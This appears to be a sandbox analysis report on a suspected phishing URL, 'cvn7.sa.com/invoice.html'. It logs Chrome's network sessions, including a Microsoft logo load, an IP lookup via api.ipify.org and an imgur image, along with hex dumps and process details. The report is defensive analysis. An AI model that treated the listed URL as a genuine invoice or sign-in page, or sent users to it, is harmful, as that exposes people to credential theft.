Timestamp	Bytes transferred	Direction	Data
2024-04-18 23:52:39 UTC	420	OUT	GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1 Host: aadcdn.msftauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 23:52:39 UTC	737	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Age: 2216979 Cache-Control: public, max-age=31536000 Content-MD5: nzaLxFgP7ZB3dfMcaybWzw== Content-Type: image/svg+xml Date: Thu, 18 Apr 2024 23:52:39 GMT Etag: 0x8D79A1B9F5E121A Last-Modified: Thu, 16 Jan 2020 00:32:52 GMT Server: ECAcc (agc/7F76) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 76c53dc6-501e-00c2-6dc1-7d8866000000 x-ms-version: 2009-09-19 Content-Length: 3651 Connection: close
2024-04-18 23:52:39 UTC	3651	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49735	91.185.215.3	443	5428	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 23:52:39 UTC	595	OUT	GET /favicon.ico HTTP/1.1 Host: cvn7.sa.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://cvn7.sa.com/invoice.html?app= Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 23:52:39 UTC	164	IN	HTTP/1.1 404 Not Found Date: Thu, 18 Apr 2024 23:52:39 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-04-18 23:52:39 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49745	172.67.74.152	443	5428	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 23:52:40 UTC	588	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://cvn7.sa.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://cvn7.sa.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 23:52:40 UTC	249	IN	HTTP/1.1 200 OK Date: Thu, 18 Apr 2024 23:52:40 GMT Content-Type: application/json Content-Length: 21 Connection: close Access-Control-Allow-Origin: * Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 876891e35870453f-ATL
2024-04-18 23:52:40 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 7d Data Ascii: {"ip":"81.181.57.52"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49746	104.123.200.136	443

Timestamp	Bytes transferred	Direction	Data
2024-04-18 23:52:40 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-18 23:52:40 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-neu-z1 Cache-Control: public, max-age=145032 Date: Thu, 18 Apr 2024 23:52:40 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49747	151.101.52.193	443	5428	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 23:52:40 UTC	346	OUT	GET /OttF6D2.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 23:52:40 UTC	760	IN	HTTP/1.1 200 OK Connection: close Content-Length: 181441 Content-Type: image/png Last-Modified: Thu, 04 Apr 2024 11:05:39 GMT ETag: "e274663e233bcf68301315590a1989a3" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD12-P2 X-Amz-Cf-Id: dsMlZ3QW3bJUMJEjF1Nm3Bk02MQ9MRDu9-5KsAAyfk8H79kVlMAy7w== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Thu, 18 Apr 2024 23:52:40 GMT Age: 185790 X-Served-By: cache-iad-kcgs7200114-IAD, cache-pdk-kpdk1780033-PDK X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 7, 1 X-Timer: S1713484361.837674,VS0,VE2 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2024-04-18 23:52:40 UTC	16384	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 4f 00 00 02 bb 08 02 00 00 00 4d 9d e9 b5 00 00 80 00 49 44 41 54 78 da ec fd db 72 24 49 92 26 8c e9 c1 cc 3d 02 c8 cc aa ee dd d9 59 0a 85 2b 42 ca 7f c3 0b 3e 07 5f 88 ef 4c 21 67 39 d3 55 99 88 70 77 33 55 e5 85 9a 99 5b 1c 00 04 80 40 26 32 33 b4 bb aa 00 84 87 bb b9 1d f5 f0 e9 a7 f8 7f fb 7f fd 3f e1 27 10 44 44 24 ff 07 10 00 f0 47 b7 e8 69 31 00 00 33 30 30 53 f3 7f 7e 74 9b 6e 72 93 9b dc e4 26 37 b9 c9 4d de 41 d4 34 89 e6 6c a2 a0 06 00 e0 2a 1b 11 32 15 9d ed 12 3d 08 01 00 91 10 99 10 c0 44 25 8b 89 9a 2a 98 01 02 12 51 08 18 78 bd ed 6b c5 44 2d 8b 8a ba ba b6 fe 1d 01 11 89 08 09 01 eb 33 9e 7a d6 07 57 49 df 41 10 4a e7 5c 3e b2 df 5f 0c c0 c0 44 55 c4 54 4d 0d 6c 9d 99 44 44 4c c0 Data Ascii: PNGIHDROMIDATxr$I&=Y+B>_L!g9Upw3U[@&23?'DD$Gi1300S~tnr&7MA4l2=D%QxkD-3zWIAJ\>_DUTMlDDL
2024-04-18 23:52:40 UTC	16384	IN	Data Raw: c7 a6 51 cd b2 4a ad 21 48 4c 29 a9 24 95 7d 5e 36 f3 03 22 2c 29 ed e7 fd c3 b2 9f 53 ca 26 b5 64 4f 11 1f b0 ac 75 35 ad fd 50 4b eb 11 25 4a 29 e4 29 27 42 f4 12 89 73 5e 92 3a 3b 3d d6 c1 ac 26 74 21 4f 71 1b 08 6b ff b4 22 2c 66 d7 ef 1c 7f ba 80 61 e3 87 f5 9a 1b aa 08 28 8d a1 b8 67 25 af 2f 8a 4f 57 a1 81 d5 0d b0 5a 74 de 37 06 87 0b a0 67 46 ee 5c 5d d7 7d 59 35 33 11 55 cd 28 dd fc 34 f5 19 81 98 05 96 1a 3f 5f 41 0a d0 5c 72 ab 8b c3 2d 95 eb ce 55 6b 1c 70 ab dd 86 00 82 88 28 2b 64 a2 7c 62 5d f1 8a de fb b2 9a 8b c7 dd de bf 40 89 08 d7 da be ef b1 df 39 5a 5b 55 51 cf 4d 10 84 52 b9 10 b1 92 11 59 e7 c8 5c 5b 5b ca c6 bc c3 9e 5c ea f0 49 de cd 93 aa 3e 2c 33 13 b9 d1 3e a5 02 2d 39 7d 6e 1d 26 5b 27 48 a9 ac ac d5 e5 87 b5 c7 9b 3f 13 a0 Data Ascii: QJ!HL)$}^6",)S&dOu5PK%J))'Bs^:;=&t!Oqk",fa(g%/OWZt7gF\]}Y53U(4?_A\r-Ukp(+d\|b]@9Z[UQMRY\[[\I>,3>-9}n&['H?
2024-04-18 23:52:41 UTC	16384	IN	Data Raw: 9f 4a 1b 6b f0 72 6a d6 88 01 90 b9 f5 5f 62 77 57 6e c3 69 33 7c a5 f4 a1 51 a8 b1 d6 66 98 3d 6b 6d f6 d8 ec fa 2e 07 9c 6f 68 df 46 00 00 80 00 49 44 41 54 ab 3f 76 08 de de 7b 70 06 b5 b1 6e 46 ed a3 86 f3 7c d1 23 8e 4e 3e ea f8 f9 ae 1c 2f 7a 61 ab 5a 3e c8 a3 a1 0c a6 27 82 e4 2f d2 c8 fb 29 da 8a 6c f5 18 bf b3 0f 3a ea 9f d6 e6 a7 df eb e8 87 9f 55 bc ae 07 01 12 92 f9 6b 17 ee 41 df 4b 6a 91 f5 03 6a 6e ff a5 57 aa d9 43 9b 6d 53 2f d7 f8 2e 60 6d 4a d7 28 63 d9 b2 7f f6 ce 7b b5 1c ed a5 f6 de 75 ec dc 05 7e 64 d1 75 2e c5 7e 60 8a a9 5c 4d fd 79 9e 53 4e a6 16 42 d0 b0 b2 df 39 9c fe 09 4a d1 f7 e8 34 a8 5e 06 37 f5 fd 2d ca bb 74 95 02 00 a1 68 0f 00 4c 0c 61 f5 1b 36 a6 ee 37 9a fa d8 aa 7b a0 79 95 38 00 50 28 0c ac c9 92 5f 26 22 39 e5 94 Data Ascii: Jkrj_bwWni3\|Qf=km.ohFIDAT?v{pnF\|#N>/zaZ>'/)l:UkAKjjnWCmS/.`mJ(c{u~du.~`\MySNB9J4^7-thLa67{y8P(_&"9
2024-04-18 23:52:41 UTC	16384	IN	Data Raw: d6 ab 34 36 cc 4f 71 fa b8 7c dc 68 f7 d8 af 68 ab ea 39 95 c2 95 cc 8b 2b 87 16 66 86 41 e5 37 92 70 f4 73 8d 4c dc cb 41 c6 49 46 64 d5 2d 72 12 aa 39 e2 27 bc 29 59 92 0e d6 23 11 fd 47 07 d0 a1 da 70 58 55 c8 ba e4 73 4f 8f a1 10 a0 f5 b1 69 63 5d 73 dd 70 d3 b1 0f c0 00 c6 80 b3 38 9b e0 d1 94 66 13 53 95 68 2d 1b 64 80 d0 af fd b6 f3 9e 99 25 23 98 c8 e7 5a 0b 5c b8 7a db b6 44 84 00 64 8c 14 c0 e0 a4 08 42 3a f7 ca b2 d4 d3 ad 6d db e5 72 59 d7 b5 dc 3c 55 50 3e 18 c4 39 5a de 85 93 7a 99 ca 92 20 31 96 e0 aa 56 7a 84 dd d7 b8 2e e7 ba ae db b6 0d 21 48 a9 45 f9 36 75 ac 4e fb 70 94 fe 3c 5d ec b0 49 35 70 4f 62 ed 53 c7 8d d9 fe fa b8 de 79 0f 65 80 08 d1 43 e8 38 d4 e4 17 26 2c 2b f0 33 17 7d 05 1c 8d b5 14 a0 28 ab b2 2c cb c2 15 eb 41 95 ba d9 Data Ascii: 46Oq\|hh9+fA7psLAIFd-r9')Y#GpXUsOic]sp8fSh-d%#Z\zDdB:mrY<UP>9Zz 1Vz.!HE6uNp<]I5pObSyeC8&,+3}(,A
2024-04-18 23:52:41 UTC	16384	IN	Data Raw: fc ac 6e 9b 10 18 58 a9 fe bb e9 f4 1f 5f 9f fc cb fb b7 ff f2 ed db 5f bf 7d f5 fa 68 5a 39 6b 89 44 66 8f 10 43 6c eb ee fc bc fd e5 a2 fd e8 63 5b 9a d9 71 8e dc 1d a8 00 00 80 00 49 44 41 54 f9 ee c8 bd 2d ed 11 d2 83 ba f4 2b bb 3e 2c e1 7f ea f1 1d 19 19 fb 42 aa f3 ca ca af 8c ed c8 6c ff 00 78 ea c9 87 32 32 32 32 32 32 f6 0b 35 ec 87 10 84 d1 3d b9 83 32 32 f8 10 84 ea ff f8 e9 cb ff fd e9 97 ff fd b7 9f ff e3 97 4f 7f f9 7a fe 79 d9 d4 21 44 66 04 2c 0c 4d 85 ea bf 39 fd d7 6f df fd db f7 df fc ee fd db 6f 4f 8f 8e aa c2 d9 de 8d 9f 21 86 e8 db b0 9c 77 9f 3e d7 3f 7e 5e fe d8 f8 45 e5 8e db 38 07 66 44 42 24 83 f6 81 09 ff 01 ed 87 b9 fc 5e 46 46 8a bc 10 32 76 47 66 fb 19 19 19 19 19 19 19 87 87 12 7e 22 7a 72 b2 6c 64 f0 31 2e db ee d3 c5 e2 Data Ascii: nX__}hZ9kDfClc[qIDAT-+>,Blx2222225=22Ozy!Df,M9ooO!w>?~^E8fDB$^FF2vGf~"zrld1.
2024-04-18 23:52:41 UTC	16384	IN	Data Raw: d6 7b 37 55 22 ae 97 cb e5 8f 3f 2e 71 a9 c2 e8 aa 7d 5b d7 75 0c 8d 8c d3 2f 25 23 29 7a ef 5b ef c3 d4 b4 6f 7d 7d bc 6e 6b 0f a4 32 46 6b 85 09 2c 52 5e d8 4d 79 bb 02 23 20 4a 29 cb e5 f2 10 bb d0 da 7b 9b 59 27 de 16 f9 3a 1a bd af d7 a7 64 f4 c3 82 4b 53 0f 12 21 c2 ca a1 bd f7 6d 5d d7 eb f5 ba 6e 1a 8e 45 ca d2 6a 2d 1c 60 6a aa 81 68 81 24 b5 d4 7c 67 39 33 7e 44 07 ff 9e 0c 63 6a 3a c6 d8 7a 57 87 ae 66 6e bd af e4 a6 db f5 fa f8 b4 0d 23 ae 8b 23 20 8a 84 9a ea 18 1a 14 54 2c 05 49 c2 09 22 3c 63 91 f2 d5 a0 10 18 1e 0e 60 3a fa d6 fb 18 81 3c fb 6d 59 5a 33 af 1e f1 93 a4 9d be fd 57 5e 24 f0 c3 bf 37 34 f7 c4 89 17 f8 7c 9a 9c 83 ff c4 b7 e0 64 fb bf 3d 10 8f b0 03 40 f4 88 e1 a6 43 03 b0 32 e1 2e 8d ec a1 bd f7 75 f4 36 6c 49 9f f8 7b dc 3a Data Ascii: {7U"?.q}[u/%#)z[o}}nk2Fk,R^My# J){Y':dKS!m]nEj-`jh$\|g93~Dcj:zWfn## T,I"<c`:<mYZ3W^$74\|d=@C2.u6lI{:
2024-04-18 23:52:41 UTC	16384	IN	Data Raw: ae 36 86 aa 3a b0 94 56 4a c9 bc 0b 73 f7 30 30 b5 b1 69 df ba 99 33 63 ad 22 2d 2f 26 08 94 2b 04 72 d2 7d 73 cf d8 69 22 5e 2e 17 83 00 84 28 9c 59 10 eb f5 ba 6d 5d 2d 30 a3 7f 10 6c f4 75 d3 98 a4 28 78 00 00 80 00 49 44 41 54 4d cd 3c 3c 46 ef eb d3 d3 ba 75 67 a9 aa 4b ab 0c e1 e1 46 84 a3 33 02 b8 01 04 95 7a 79 f8 e3 3f ff 13 99 78 b3 8b 13 9e f8 5d 10 11 6e ae 63 8c 6d eb eb ba ae d7 6e 81 7d 28 22 16 26 c6 e0 0c 8c 19 99 af 33 ba 45 a0 08 0f 41 80 18 a3 77 55 05 77 ec 69 7f ca 37 96 c7 47 b4 1b c5 91 23 63 f9 7a 1e 43 c1 1c 09 89 62 74 0c eb eb d3 f5 e9 69 1d ea 52 2f 7f 38 20 34 c1 f0 70 73 37 30 4f dd 9d 99 62 e3 3e 23 d4 32 83 cf 1d 03 23 08 40 87 8e 3e b4 0f 27 47 d9 c6 e8 aa 3a d5 fc de 9e ee 7f 3c 33 cc 89 13 27 4e 7c 10 a4 56 d9 c9 f6 7f Data Ascii: 6:VJs00i3c"-/&+r}si"^.(Ym]-0lu(xIDATM<<FugKF3zy?x]ncmn}("&3EAwUwi7G#czCbtiR/8 4ps70Ob>#2#@>'G:<3'N\|V
2024-04-18 23:52:41 UTC	16384	IN	Data Raw: f4 f4 e9 e9 b6 cf b4 ed fa af 70 bf 6e 8a b1 df 6e cf fb 11 6c 29 fd 32 a6 47 64 c6 fa 9f fb 9c f3 d8 8f fd f0 80 98 7b 6b 40 1c cf b7 e7 a7 db 98 21 d6 3d a1 d6 2e bd 6f dd 2c be ea 72 ac 52 4a 29 df 40 45 fb df d9 77 9f 26 f7 48 b0 7f bf ae 98 00 53 95 02 23 3c c2 c3 e7 1c 99 94 63 df 8e e3 98 73 fa 7d 9d fb f7 6e bd df 58 4b 3e c7 3e 9e 3f 3d ff e7 ff f7 ef ff 7c fa f8 e4 d3 45 44 d5 9a ad 49 db 12 3e 6f b7 db 6d 1f 1e 29 22 02 20 5c 00 6d d6 7a 13 95 39 7d 8c e9 09 35 b5 de 48 5d 43 fb 4a 9a 00 19 9e a4 f6 cb 07 77 a8 a8 99 a9 e4 db 9b ce 9f 09 20 32 e6 9c 63 62 26 09 26 46 8e dd 7d ac dc 8b 81 3c 13 3f 49 8a af 19 dd 81 90 8c 20 72 cc 71 8c e3 18 ee c1 88 00 c2 07 e0 c3 8f 31 93 62 11 90 cc 10 86 8f e7 db ed 76 78 50 b6 a4 b5 e3 d8 8f d9 37 6f 2d 22 Data Ascii: pnnl)2Gd{k@!=.o,rRJ)@Ew&HS#<cs}nXK>>?=\|EDI>om)" \mz9}5H]CJw 2cb&&F}<?I rq1bvxP7o-"
2024-04-18 23:52:41 UTC	16384	IN	Data Raw: 0a 16 08 44 a8 0a 61 26 18 58 d5 07 78 96 ee cd cc 95 45 3f 60 81 04 a9 14 49 55 10 11 11 0e cc 19 73 c4 9c 31 06 92 98 bb 3f 3f 8d 8f 9f e6 c7 a7 f9 74 f3 7d 4f 10 a6 31 95 ca 4c cf 8c 5c 6f 20 02 19 48 bf d7 08 2c a5 94 f2 ee 55 e0 2f 3e 63 00 00 80 00 49 44 41 54 b4 5f 4a 29 a5 94 af 83 8f 80 df a4 35 e9 13 6e 6c 4d 9a 09 90 cc 0c 81 28 21 4c e4 4b 9d 79 9c 75 e3 55 cf 64 f5 ca 44 a4 cf 3c 76 df f7 58 d1 7e 46 ce 00 02 9a 49 a6 aa d8 58 c3 fe d1 95 42 f2 5b 96 8e 5f f1 3d a9 ab b4 9e 88 d2 19 88 91 73 e4 18 18 7b 06 73 dc 72 df f3 18 08 dc cb dd 11 99 31 27 52 28 c8 c8 7b be 83 c4 4a 3e 08 a1 92 68 19 91 d3 49 66 02 29 a0 80 ab 74 1f b1 ee 1b 11 01 c6 9a 5c 70 c4 c1 9c c8 63 9f 9f 9e e6 d3 93 3f 3d fb ed 16 fb 91 22 38 2c 9a 12 82 08 20 ce f2 85 0c 62 Data Ascii: Da&XxE?`IUs1??t}O1L\o H,U/>cIDAT_J)5nlM(!LKyuUdD<vX~FIXB[_=s{sr1'R({J>hIf)t\pc?="8, b
2024-04-18 23:52:41 UTC	16384	IN	Data Raw: de d7 d3 bf b2 9f c5 57 aa 37 73 cd 8d 71 36 97 c9 5c b0 66 9c 3c 9f 2f 66 55 44 1c 47 8c c8 2c 8a a8 cf 8c f6 d4 9c a9 aa a2 e8 e9 89 5b 64 44 8c 51 91 a4 a8 99 f5 66 bd d9 cc d4 cf de b8 2a 66 e6 88 88 2c 72 4a e5 89 b0 32 e2 38 32 ea 7c 53 ea 6a 22 24 6b 1e 39 ef ce 67 ab 9d 80 67 02 82 97 43 0f ab 32 46 8c 28 c0 cc 9a bb bb cd a9 b8 ca 4a 02 a6 e6 2e 0a 56 45 64 c4 d3 96 cf 5b 6f 5b 73 b8 ad 80 7f b1 58 2c 3e 04 2b da ff 98 4c b1 9d aa aa ca c8 31 f2 f4 10 02 54 a0 cc 71 88 8a 98 6b eb a6 8a 88 f1 78 8c 91 a5 e2 5b 77 13 e4 88 63 54 89 f6 ad 6f 23 ba 09 aa b2 2a 50 04 b3 f2 38 c6 e3 71 ec 8f 54 31 03 3e dd 7c dc 2c bc cd a4 c0 c8 8a 42 41 66 9a df 4d 0d 60 d6 11 63 44 46 29 d5 6c 76 0c 44 ec fb 71 7f 1c 23 ab 4c 25 c6 1c 42 a8 b3 13 e1 f6 8f 1f 6e ff Data Ascii: W7sq6\f</fUDG,[dDQff,rJ282\|Sj"$k9ggC2F(J.VEd[o[sX,>+L1Tqkx[wcTo#P8qT1>\|,BAfM`cDF)lvDq#L%Bn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49748	104.123.200.136	443

Timestamp	Bytes transferred	Direction	Data
2024-04-18 23:52:41 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-18 23:52:42 UTC	531	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0rcGnYgAAAAANOnx9vccHTr21ROgX9ESTU0pDRURHRTAzMDkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm Cache-Control: public, max-age=144993 Date: Thu, 18 Apr 2024 23:52:41 GMT Content-Length: 55 Connection: close X-CID: 2
2024-04-18 23:52:42 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49749	172.67.74.152	443	5428	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 23:52:42 UTC	349	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 23:52:42 UTC	217	IN	HTTP/1.1 200 OK Date: Thu, 18 Apr 2024 23:52:42 GMT Content-Type: application/json Content-Length: 21 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 876891f34f71ad95-ATL
2024-04-18 23:52:42 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 7d Data Ascii: {"ip":"81.181.57.52"}

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 5844, Parent PID: 1364

General

Target ID:	0
Start time:	01:52:29
Start date:	19/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 5428, Parent PID: 5844

General

Target ID:	2
Start time:	01:52:32
Start date:	19/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2208,i,10511966105780374271,9107718305647574607,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6536, Parent PID: 1364

General

Target ID:	3
Start time:	01:52:35
Start date:	19/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://cvn7.sa.com/invoice.html?app="
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly